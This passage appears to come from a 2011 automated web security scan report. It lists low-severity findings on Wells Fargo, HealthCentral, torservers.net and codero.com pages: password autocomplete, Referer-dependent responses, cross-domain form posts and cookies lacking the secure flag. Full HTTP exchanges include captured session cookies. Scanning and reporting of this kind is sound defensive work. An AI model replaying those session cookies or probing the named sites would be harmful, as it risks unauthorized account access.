   <table cellpadding="2" cellspacing="2" border="0">
...[SNIP]...
<td align="left">
               <input type="password" name="value(password)" accesskey="P" tabindex="2" value="" id="password">
           </td>
...[SNIP]...

9.5. https://wfefs.wellsfargo.com/eoa/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://wfefs.wellsfargo.com
Path:   /eoa/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /eoa/ HTTP/1.1
Host: wfefs.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:58:18 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-Cache
Pragma: No-Cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 7704


<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Educational Online Access</title>
   <link rel="stylesheet" href="/eoa/common/
...[SNIP]...
<body>

<form name="loginForm" method="POST" action="/eoa/loginUser.efs"><div>
...[SNIP]...
<td align="left"><input type="password" name="value(password)" tabindex="2" value=""></td>
...[SNIP]...

9.6. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/ HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; CONCRETE5=7e3f03933c1bb0d06b1d5726e207837d; c_search=_search; s_cc=true; s_sq=cmi-choicemediacom%3D%2526pid%253DVerticals%252520%25253E%252520ADHD%252520%25253E%252520Slideshows%252520%25253E%252520Common%252520Symptoms%252520of%252520ADD%252520%252526%252520ADHD%252520in%252520Women%252520%25253E%252520Hypersensitivity%252520to%252520Noise%25252C%252520Touch%252520%252526%252520Smell%2526pidt%253D1%2526oid%253Dhttp%25253A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:58:54 GMT
Date: Tue, 19 Jul 2011 01:58:54 GMT
Content-Length: 36637
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Feeling Low Self-Worth - Common Symptoms of ADD & ADHD in Women - ADHD</titl
...[SNIP]...
</div>
<form onsubmit="new Ajax.Request('/adhd/c/login', {asynchronous:true, evalScripts:true, method:'post', parameters:Form.serialize(this)}); return false;" method="post" action="#">
<div class="text">
...[SNIP]...
</label><input type="password" tabindex="101" size="30" name="user[password]" id="mini_home_user_password">
</div>
...[SNIP]...

9.7. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825 HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://paid.outbrain.com/network/redir?key=ea083f1f0a8664e17286dd018ebbd632&rdid=218341001&type=CAD_def_prd&in-site=false&pc_id=3389484&req_id=21fd5e9603ad3d38cc44a355febaf417&agent=blog_JS_rec&recMode=4&reqType=1&wid=1&imgType=0&version=40317&idx=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:59:05 GMT
Date: Tue, 19 Jul 2011 01:59:05 GMT
Content-Length: 36632
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Common Symptoms of ADD & ADHD in Women - ADHD</title>
<META http-equiv="Con
...[SNIP]...
</div>
<form onsubmit="new Ajax.Request('/adhd/c/login', {asynchronous:true, evalScripts:true, method:'post', parameters:Form.serialize(this)}); return false;" method="post" action="#">
<div class="text">
...[SNIP]...
</label><input type="password" tabindex="101" size="30" name="user[password]" id="mini_home_user_password">
</div>
...[SNIP]...

10. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.wellsfargo.com
Path:   /com/contact_us_form

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /com/contact_us_form HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/pi_action/rcboLocator
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941

Response 1

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:40 GMT
Content-length: 11161
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Commercial &#8211;
...[SNIP]...
<input type="hidden" name="refererURL" value="/pi_action/rcboLocator">
   <input type="hidden" name="contactURL" value="">
</form>
<br />

</div><!-- end contentLeft -->


   <div id="contentRight"><div class='infoBox'><h3 class='c24InfoTitle'>Reset Password</h3> <p class='c24Text'>Change your <em>CEO<sup>&reg;</sup>
</em> portal password <a href="https://wellsoffice.wellsfargo.com/ceoportal/signon/public/ContactUs.jsp">here</a>. For technical support, call toll free <strong>1-800-289-3557</strong>.</p></div></div><!-- end contentRight -->

<div class="clearAll">&nbsp;</div></div><!-- end multiCol -->
<div class="clearAll">&nbsp;</div></div><!-- end contentCol -->
<div class="clearAll">&nbsp;</div></div><!-- end main -->
<div id="footer"><p class="footer1"><a href="/about/">About Wells Fargo</a> | <a href="/careers/">Careers</a> | <a href="/privacy_security/">Privacy, Security &amp; Legal</a> | <a href="/">Home</a> | <a href="/com/sitemap">Sitemap</a></p><p class="footer2">

&copy; 1999 - 2011 Wells Fargo. All rights reserved. NMLSR ID 399801</p></div></div><!-- end shell -->
</body></html>

Request 2

GET /com/contact_us_form HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941

Response 2

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:59 GMT
Content-length: 11143
Content-type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Commercial &#8211;
...[SNIP]...
<input type="hidden" name="refererURL" value="null">
   <input type="hidden" name="contactURL" value="">
</form>
<br />

</div><!-- end contentLeft -->


   <div id="contentRight"><div class='infoBox'><h3 class='c24InfoTitle'>Reset Password</h3> <p class='c24Text'>Change your <em>CEO<sup>&reg;</sup>
</em> portal password <a href="https://wellsoffice.wellsfargo.com/ceoportal/signon/public/ContactUs.jsp">here</a>. For technical support, call toll free <strong>1-800-289-3557</strong>.</p></div></div><!-- end contentRight -->

<div class="clearAll">&nbsp;</div></div><!-- end multiCol -->
<div class="clearAll">&nbsp;</div></div><!-- end contentCol -->
<div class="clearAll">&nbsp;</div></div><!-- end main -->
<div id="footer"><p class="footer1"><a href="/about/">About Wells Fargo</a> | <a href="/careers/">Careers</a> | <a href="/privacy_security/">Privacy, Security &amp; Legal</a> | <a href="/">Home</a> | <a href="/com/sitemap">Sitemap</a></p><p class="footer2">

&copy; 1999 - 2011 Wells Fargo. All rights reserved. NMLSR ID 399801</p></div></div><!-- end shell -->
</body></html>

11. Cross-domain POST  previous  next
There are 5 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


11.1. https://www.torservers.net/donate.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /donate.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /donate.html HTTP/1.1
Host: www.torservers.net
Connection: keep-alive
Referer: https://www.torservers.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31556926;includeSubDomains
X-Content-Security-Policy: allow 'self' *.torservers.net
Content-type: text/html
Date: Tue, 19 Jul 2011 01:59:32 GMT
Server: lighttpd
Content-Length: 24791

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h4>
   <form action='https://www.paypal.com/cgi-bin/webscr' id='paypalForm' method='post' target='_blank'>
   <input name='cmd' type='hidden' value='_donations' />
...[SNIP]...

11.2. https://www.torservers.net/donate.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /donate.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /donate.html HTTP/1.1
Host: www.torservers.net
Connection: keep-alive
Referer: https://www.torservers.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31556926;includeSubDomains
X-Content-Security-Policy: allow 'self' *.torservers.net
Content-type: text/html
Date: Tue, 19 Jul 2011 01:59:32 GMT
Server: lighttpd
Content-Length: 24791

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h4>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post" target='_blank'>
<input type="hidden" name="cmd" value="_xclick-subscriptions"/>
...[SNIP]...

11.3. https://www.wellsfargoadvisors.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.wellsfargo.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.wellsfargoadvisors.com
Connection: keep-alive
Referer: https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&nextpage=PWRESET&returnurl=http%3a//www.wachovia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:53:09 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 18 Jul 2011 19:30:09 GMT
ETag: "612-4423-6f53240"
Accept-Ranges: bytes
Content-Length: 17443
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.o
...[SNIP]...
</div>


<form action="https://www.wellsfargo.com/locator/wellsfargoadvisors/search" method="post" name="searchForm" onsubmit="return validateZIP();"><input id="Addr" name="addrLine" type="hidden" value="">
...[SNIP]...

11.4. https://www.wellsfargoadvisors.com/js/branchLocator.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /js/branchLocator.js

Issue detail

The page contains a form which POSTs data to the domain www.wellsfargo.com. The form contains the following fields:

Request

GET /js/branchLocator.js HTTP/1.1
Host: www.wellsfargoadvisors.com
Connection: keep-alive
Referer: https://www.wellsfargoadvisors.com/market-economy/economic-market-reports/stock-markets.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gridTracking=A2%20-%20The%20Week; s_sq=wsinternetglobal%2Cwspublic%3D%2526pid%253Dhttps%25253A%25252F%25252Fwww.wellsfargoadvisors.com%25252F%2526oid%253Dhttps%25253A%25252F%25252Fwww.wellsfargoadvisors.com%25252Fmarket-economy%25252Feconomic-market-reports%25252Fstock-markets.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:53:47 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 14 Jan 2011 16:37:10 GMT
ETag: "8c1-50e-badd980"
Accept-Ranges: bytes
Content-Length: 1294
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

//if the FAWP cookie does not exist, then display the branch locator
if(FAWPcookie == null) {

   document.write('<tr>');
   document.write('<td class="searchtype">');
   document.write('<form name="searchForm" method="post" action="https://www.wellsfargo.com/locator/wellsfargoadvisors/search" onSubmit="return validateZIP();">');
   document.write('<input id="Addr" name="addrLine" type="hidden" value=""/>
...[SNIP]...

11.5. https://www.wellsfargoadvisors.com/online-access/signon.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /online-access/signon.htm

Issue detail

The page contains a form which POSTs data to the domain onlineservices.wellsfargo.com. The form contains the following fields:

Request

GET /online-access/signon.htm HTTP/1.1
Host: www.wellsfargoadvisors.com
Connection: keep-alive
Referer: https://www.wellsfargoadvisors.com/conversion/signon-decision.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gridTracking=%5B%5BB%5D%5D; s_cc=true; s_sq=wsinternetglobal%2Cwspublic%3D%2526pid%253Dconversion%25253Asignon-decision.htm%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fwww.wellsfargoadvisors.com%25252Fonline-access%25252Fsignon.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:54:36 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 18 Jul 2011 14:45:13 GMT
ETag: "e77-34d1-bf4f040"
Accept-Ranges: bytes
Content-Length: 13521
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.o
...[SNIP]...
<div id="left">

<form action="https://onlineservices.wellsfargo.com/auth/login/do" autocomplete="Off" method="post" onsubmit="return disableSubmitsCollectUserPrefs(this);">

<div id="uname">
...[SNIP]...

12. SSL cookie without secure flag set  previous  next
There are 6 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


12.1. https://online.wellsfargo.com/das/signon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/signon

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /das/signon HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://online.wellsfargo.com/das/channel/enrollDisplay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=LOB=CONS; BRAND_COOKIE=COB

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:50:06 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN=source=alternate; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

12.2. https://online.wellsfargo.com/signon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signon?LOB=CONS HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/locator/atm/search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:46:47 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN= LOB=CONS; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

12.3. https://secure.codero.com/order/v/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.codero.com
Path:   /order/v/shop

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /order/v/shop?cart=empty HTTP/1.1
Host: secure.codero.com
Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1822897535.1311040801.1311040801.1311040801.1; __utmb=1.1.10.1311040801; __utmc=1; __utmz=1.1311040801.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2021343739-1311040801254; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1311037236103:ss=1311037201593; orderformv1=9p25frmj6slceji5v0d7oe4u42

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:49 GMT
Server: Apache/2.2
Vary: Host,Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: UBERSID=rfugnf2bmkoul17ds1inessum5; path=/; HttpOnly
